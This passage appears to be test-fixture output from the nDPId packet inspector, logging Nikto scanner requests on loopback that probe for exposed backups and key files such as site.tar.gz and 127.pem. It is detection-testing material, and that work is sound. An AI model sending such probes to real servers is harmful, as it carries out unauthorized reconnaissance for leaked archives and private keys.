+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276893,"flow_last_seen":1576420276893,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49832,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":145,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276894,"flow_last_seen":1576420276894,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276894,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49834,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1576420276894,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276894,"pkt":"AAAAAAAAAAAAAAAACABFAADDA5ZAAEAGOJ1\/AAABfwAAAcKqH5B\/mzvUPuYs44AYAED+twAAAQEICp1m+8adZvvGR0VUIC8xMjcudGFyLmJ6MiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} 
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276894,"flow_last_seen":1576420276894,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276894,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49834,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":146,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276896,"flow_last_seen":1576420276896,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49836,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1576420276896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276896,"pkt":"AAAAAAAAAAAAAAAACABFAADD\/SZAAEAGPwx\/AAABfwAAAcKsH5AB18VtW5jVeIAYAED+twAAAQEICp1m+8idZvvIR0VUIC8xMjcudGFyLmJ6MiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276896,"flow_last_seen":1576420276896,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49836,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":147,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276897,"flow_last_seen":1576420276897,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276897,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49838,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1576420276897,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276897,"pkt":"AAAAAAAAAAAAAAAACABFAADFBrJAAEAGNX9\/AAABfwAAAcKuH5Ayaz75EQ6Mk4AYAED+uQAAAQEICp1m+8mdZvvJR0VUIC8xMjcuMC50YXIuYnoyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276897,"flow_last_seen":1576420276897,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276897,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49838,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":148,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276900,"flow_last_seen":1576420276900,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276900,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49840,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1576420276900,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276900,"pkt":"AAAAAAAAAAAAAAAACABFAADFczBAAEAGyQB\/AAABfwAAAcKwH5A3G0tor3ywHoAYAED+uQAAAQEICp1m+8ydZvvMR0VUIC8xMjcuMC50YXIuYnoyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":148,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276900,"flow_last_seen":1576420276900,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276900,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49840,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":149,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276901,"flow_last_seen":1576420276901,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49842,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1576420276901,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276901,"pkt":"AAAAAAAAAAAAAAAACABFAADD0l1AAEAGadV\/AAABfwAAAcKyH5CdU+oT47LjtYAYAED+twAAAQEICp1m+82dZvvNR0VUIC9zaXRlLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276901,"flow_last_seen":1576420276901,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49842,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":150,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276903,"flow_last_seen":1576420276903,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49844,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1576420276903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276903,"pkt":"AAAAAAAAAAAAAAAACABFAADDR55AAEAG9JR\/AAABfwAAAcK0H5AcfX\/WOy6jEYAYAED+twAAAQEICp1m+8+dZvvOR0VUIC9zaXRlLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276903,"flow_last_seen":1576420276903,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49844,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":151,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276904,"flow_last_seen":1576420276904,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276904,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49846,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1576420276904,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276904,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/WUtAAEAG4ut\/AAABfwAAAcK2H5D8ZmEEi9guOYAYAED+swAAAQEICp1m+9CdZvvQR0VUIC8xMjcucGVtIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276904,"flow_last_seen":1576420276904,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276904,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49846,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":152,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276905,"flow_last_seen":1576420276905,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49848,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1576420276905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276905,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/HslAAEAGHW5\/AAABfwAAAcK4H5CgfyaOuiPkq4AYAED+swAAAQEICp1m+9GdZvvRR0VUIC8xMjcucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276905,"flow_last_seen":1576420276905,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49848,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":153,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276907,"flow_last_seen":1576420276907,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49850,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1576420276907,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276907,"pkt":"AAAAAAAAAAAAAAAACABFAAC9zZ5AAEAGbpp\/AAABfwAAAcK6H5CXJ\/XXeafd0YAYAED+sQAAAQEICp1m+9OdZvvSR0VUIC8wLnRhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276907,"flow_last_seen":1576420276907,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49850,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":154,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276908,"flow_last_seen":1576420276908,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49852,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1576420276908,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276908,"pkt":"AAAAAAAAAAAAAAAACABFAAC9umJAAEAGgdZ\/AAABfwAAAcK8H5Cw+YIsSeaYa4AYAED+sQAAAQEICp1m+9SdZvvUR0VUIC8wLnRhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276908,"flow_last_seen":1576420276908,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49852,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276910,"flow_last_seen":1576420276910,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49854,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
